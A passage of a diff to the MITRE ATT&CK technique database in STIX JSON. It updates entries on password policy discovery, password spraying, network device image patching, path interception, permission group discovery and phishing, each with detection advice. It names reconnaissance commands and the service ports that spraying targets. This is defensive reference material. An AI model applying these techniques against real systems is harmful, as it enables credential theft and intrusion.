enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)", "external_references": [ { "source_name": "mitre-attack", @@ -19424,7 +22422,7 @@ "phase_name": "discovery" } ], - "modified": "2020-03-26T17:17:42.457Z", + "modified": "2020-09-29T14:48:07.227Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -19443,18 +22441,9 @@ "x_mitre_contributors": [ "Sudhanshu Chauhan, @Sudhanshu_C" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { - "created": "2020-02-11T18:39:25.122Z", - "modified": "2020-03-29T17:13:57.172Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "credential-access" - } - ], - "type": "attack-pattern", "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", "name": "Password Spraying", @@ -19468,6 +22457,11 @@ "external_id": "T1110.003", "url": "https://attack.mitre.org/techniques/T1110/003" }, + { + "external_id": "CAPEC-565", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/565.html" + }, { "url": "http://www.blackhillsinfosec.com/?p=4645", "description": "Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017.", @@ -19484,6 +22478,15 @@ "description": "Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019." } ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "modified": "2020-10-19T22:43:45.579Z", + "created": "2020-02-11T18:39:25.122Z", "x_mitre_platforms": [ "Linux", "macOS", @@ -19496,7 +22499,7 @@ "SaaS" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.", "x_mitre_permissions_required": [ "User" @@ -19510,6 +22513,80 @@ "John Strand" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1601.001", + "url": "https://attack.mitre.org/techniques/T1601/001" + }, + { + "source_name": "Killing the myth of Cisco IOS rootkits", + "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf", + "description": "Sebastian 'topo' Mu\u00f1iz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020." + }, + { + "source_name": "Killing IOS diversity myth", + "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf", + "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020." + }, + { + "source_name": "Cisco IOS Shellcode", + "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf", + "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020." + }, + { + "source_name": "Cisco IOS Forensics Developments", + "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf", + "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020." + }, + { + "source_name": "Juniper Netscreen of the Dead", + "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf", + "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Patch System Image", + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ", + "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-22T17:50:46.560Z", + "created": "2020-10-19T19:49:24.129Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_data_sources": [ + "Network device run-time memory", + "Network device configuration", + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ] + }, { "id": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -19615,13 +22692,23 @@ "x_mitre_deprecated": true }, { - "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", - "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.", - "name": "Path Interception by PATH Environment Variable", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2020-03-13T14:10:43.424Z", + "modified": "2020-09-16T16:56:34.583Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } ], + "type": "attack-pattern", "external_references": [ { "source_name": "mitre-attack", @@ -19629,63 +22716,41 @@ "url": "https://attack.mitre.org/techniques/T1574/007" }, { - "external_id": "CAPEC-capec", + "external_id": "CAPEC-13", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/capec.html" - } - ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" + "url": "https://capec.mitre.org/data/definitions/13.html" }, { - "kill_chain_name": "mitre-attack", - "phase_name": "privilege-escalation" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" + "external_id": "CAPEC-38", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/38.html" } ], - "modified": "2020-06-20T22:02:40.983Z", - "created": "2020-03-13T14:10:43.424Z", - "x_mitre_platforms": [ - "Windows" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "x_mitre_contributors": [ - "Stefan Kanthak" + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Path Interception by PATH Environment Variable", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.", + "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "x_mitre_defense_bypassed": [ + "Application control" ], + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_data_sources": [ "Process monitoring", "File monitoring" ], - "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", - "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", - "x_mitre_defense_bypassed": [ - "Application control" + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "x_mitre_platforms": [ + "Windows" ] }, { - "created": "2020-03-13T17:48:58.999Z", - "modified": "2020-03-26T20:03:27.496Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "privilege-escalation" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "type": "attack-pattern", "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).", "name": "Path Interception by Search Order Hijacking", @@ -19700,9 +22765,9 @@ "url": "https://attack.mitre.org/techniques/T1574/008" }, { - "external_id": "CAPEC-CAPEC", + "external_id": "CAPEC-159", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/CAPEC.html" + "url": "https://capec.mitre.org/data/definitions/159.html" }, { "url": "http://msdn.microsoft.com/en-us/library/ms682425", @@ -19725,6 +22790,23 @@ "description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016." } ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-09-17T19:03:35.217Z", + "created": "2020-03-13T17:48:58.999Z", "x_mitre_platforms": [ "Windows" ], @@ -19750,23 +22832,6 @@ "x_mitre_version": "1.0" }, { - "created": "2020-03-13T13:51:58.519Z", - "modified": "2020-03-26T19:55:39.867Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "privilege-escalation" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "type": "attack-pattern", "external_references": [ { "source_name": "mitre-attack", @@ -19774,9 +22839,9 @@ "url": "https://attack.mitre.org/techniques/T1574/009" }, { - "external_id": "CAPEC-capec", + "external_id": "CAPEC-38", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/capec.html" + "url": "https://capec.mitre.org/data/definitions/38.html" }, { "source_name": "Microsoft CurrentControlSet Services", @@ -19806,7 +22871,24 @@ "name": "Path Interception by Unquoted Path", "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.", "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", - "x_mitre_version": "1.0", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-09-17T19:05:23.755Z", + "created": "2020-03-13T13:51:58.519Z", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_data_sources": [ @@ -19869,15 +22951,6 @@ "x_mitre_is_subtechnique": false }, { - "created": "2017-05-31T21:30:55.471Z", - "modified": "2020-03-26T17:48:28.002Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "discovery" - } - ], - "type": "attack-pattern", "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Permission Groups Discovery", @@ -19897,6 +22970,15 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "modified": "2020-10-08T17:36:01.675Z", + "created": "2017-05-31T21:30:55.471Z", "x_mitre_is_subtechnique": false, "x_mitre_contributors": [ "Microsoft Threat Intelligence Center (MSTIC)" @@ -19917,15 +22999,25 @@ ], "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_data_sources": [ + "Stackdriver logs", + "GCP audit logs", + "AWS CloudTrail logs", "Azure activity logs", "Office 365 account logs", "API monitoring", "Process monitoring", "Process command-line parameters" ], - "x_mitre_version": "2.1" + "x_mitre_version": "2.2" }, { + "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.", + "name": "Phishing", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -19938,13 +23030,6 @@ "url": "https://capec.mitre.org/data/definitions/98.html" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Phishing", - "description": "Adversaries may send phishing messages to elicit sensitive information and/or gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victim\u2019s emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.", - "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "type": "attack-pattern", "kill_chain_phases": [ { @@ -19952,8 +23037,18 @@ "phase_name": "initial-access" } ], - "modified": "2020-03-28T00:04:46.427Z", + "modified": "2020-10-18T01:55:03.337Z", "created": "2020-03-02T18:45:07.892Z", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "SaaS", + "Office 365" + ], + "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", + "x_mitre_is_subtechnique": false, + "x_mitre_version": "2.0", "x_mitre_data_sources": [ "File monitoring", "Packet capture", @@ -19964,16 +23059,81 @@ "Detonation chamber", "SSL/TLS inspection", "Anti-virus" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1598", + "url": "https://attack.mitre.org/techniques/T1598" + }, + { + "source_name": "ThreatPost Social Media Phishing", + "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/", + "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020." + }, + { + "source_name": "TrendMictro Phishing", + "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html", + "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020." + }, + { + "source_name": "PCMag FakeLogin", + "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages", + "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020." + }, + { + "source_name": "Sophos Attachment", + "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/", + "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links \u2013 when phishers bring along their own web pages. Retrieved October 20, 2020." + }, + { + "source_name": "GitHub Phishery", + "url": "https://github.com/ryhanson/phishery", + "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020." + }, + { + "source_name": "Microsoft Anti Spoofing", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020." + }, + { + "source_name": "ACSC Email Spoofing", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020." + } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Phishing for Information", + "description": "Before compromising a victim, adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.", + "id": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-25T19:44:58.292Z", + "created": "2020-10-02T17:07:01.502Z", + "x_mitre_contributors": [ + "Sebastian Salla, McAfee", + "Robert Simmons, @MalwareUtkonos" + ], + "x_mitre_data_sources": [ + "Social media monitoring", + "Mail server", + "Email gateway" + ], + "x_mitre_detection": "Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\n\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).", "x_mitre_version": "1.0", "x_mitre_is_subtechnique": false, - "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", 